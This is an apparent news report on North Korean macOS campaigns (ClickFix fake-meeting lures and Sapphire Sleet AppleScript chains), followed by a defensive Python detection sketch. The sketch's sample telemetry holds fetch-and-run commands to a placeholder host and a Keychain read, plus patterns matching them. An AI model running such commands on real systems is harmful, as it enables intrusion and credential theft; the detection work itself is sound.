North Korean cyber attackers have intensified their focus on macOS users, employing advanced social engineering tactics. These recent attacks, which target individuals in the financial sector, highlight the hackers’ evolving strategies for bypassing security measures and stealing sensitive information.
Exploiting macOS Through Social Engineering
According to recent findings by Any.Run, a well-known technique called ClickFix has been integral to these attacks. It works by deceiving macOS users into installing malware designed to siphon off valuable data. The attackers, posing as trusted contacts on Telegram, send fake meeting invitations to business executives, urging them to resolve fabricated connectivity issues by pasting specific commands into the Terminal.
This deception results in the execution of Go-based Mach-O binaries. These binaries are part of a larger malware suite, dubbed Mach-O Man, that harvests user credentials, Keychain secrets, and browser session data, then transmits them via Telegram.
AppleScript and State-Sponsored Hacking
Another campaign, linked to the state-sponsored group Sapphire Sleet, uses AppleScript to execute code and evade detection. This group, which Microsoft has tracked as active since at least 2020, has similarly focused on extracting sensitive information from its targets.
In these attacks, the hackers impersonate recruiters on professional networks to initiate contact with victims. They then invite these individuals to fictitious technical interviews, during which they are tricked into installing malicious software disguised as legitimate video conferencing tools or software updates.
Complex Attack Chains and Data Exfiltration
The Sapphire Sleet campaign diverges from the ClickFix approach by automating the execution of malicious commands. The downloaded file, delivered as an AppleScript, opens in macOS’s Script Editor and runs its embedded shell commands without further user intervention.
This infection chain involves multiple AppleScript payloads and ultimately deploys several backdoors. The attacks are designed to establish persistence and escalate privileges. The payloads also perform extensive system reconnaissance, collecting data from applications, Telegram, browser profiles, the Keychain, cryptocurrency wallets, and more.
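Both chains described on this page (the ClickFix command pasted into Terminal, and the AppleScript that opens in Script Editor and spawns a shell, which then reads the Keychain) leave a distinctive process lineage. The following detection sketch is an added example, not code from Any.Run or Microsoft; the pipe-delimited event format and the sample telemetry lines are constructed for illustration, and the hostname example.invalid is a placeholder.

```python
"""Process-lineage checks for the macOS infection paths discussed above.

Rule 1 (AppleScript chain): Script Editor or osascript spawning a shell.
Rule 2 (ClickFix): a Terminal-launched shell piping fetched content into an interpreter.
Rule 3 (harvesting): a process other than Apple's Keychain clients touching the login Keychain.
Event format (timestamp|parent|process|command line) and samples are constructed.
"""
import re

SAMPLE_EVENTS = """\
2024-05-01T10:00:01Z|launchd|Script Editor|/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor meeting-fix.scpt
2024-05-01T10:00:02Z|Script Editor|sh|sh -c "curl -fsSL http://example.invalid/stage2 -o /tmp/.s && chmod +x /tmp/.s && /tmp/.s"
2024-05-01T10:05:00Z|Terminal|zsh|zsh -c "curl -s https://example.invalid/fix.sh | bash"
2024-05-01T10:05:03Z|zsh|.s|/tmp/.s --collect /Users/alice/Library/Keychains/login.keychain-db
2024-05-01T11:00:00Z|Terminal|zsh|zsh -c "ls -la ~/Downloads"
2024-05-01T11:01:00Z|launchd|securityd|/usr/sbin/securityd -i
"""

SCRIPT_HOSTS = {"Script Editor", "osascript"}          # AppleScript runtimes
SHELLS = {"sh", "bash", "zsh"}
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|zsh)\b")
KEYCHAIN_PATH = re.compile(r"/Library/Keychains/")
APPLE_KEYCHAIN_CLIENTS = {"securityd", "security", "Keychain Access"}  # benign readers


def parse(text):
    """Split constructed telemetry into event dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, proc, cmd = line.split("|", 3)
        events.append({"ts": ts, "parent": parent, "proc": proc, "cmd": cmd})
    return events


def detect(text):
    """Return (rule, timestamp, command line) for every event matching a rule."""
    hits = []
    for e in parse(text):
        if e["parent"] in SCRIPT_HOSTS and e["proc"] in SHELLS:
            hits.append(("applescript_spawns_shell", e["ts"], e["cmd"]))
        if e["parent"] == "Terminal" and PIPE_TO_SHELL.search(e["cmd"]):
            hits.append(("clickfix_pipe_to_shell", e["ts"], e["cmd"]))
        if KEYCHAIN_PATH.search(e["cmd"]) and e["proc"] not in APPLE_KEYCHAIN_CLIENTS:
            hits.append(("keychain_read_by_untrusted_process", e["ts"], e["cmd"]))
    return hits


if __name__ == "__main__":
    for rule, ts, cmd in detect(SAMPLE_EVENTS):
        print(f"{ts} {rule}: {cmd}")
```

On the sample, the two benign events (a user listing Downloads and securityd starting) produce no hits, while each stage of the constructed chain trips exactly one rule.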
These ongoing campaigns underscore the persistent threat posed by North Korean hackers, as they continue to refine their techniques to compromise high-value targets. With their ability to adapt and employ multiple attack vectors, these hackers remain a significant concern for cybersecurity experts worldwide.
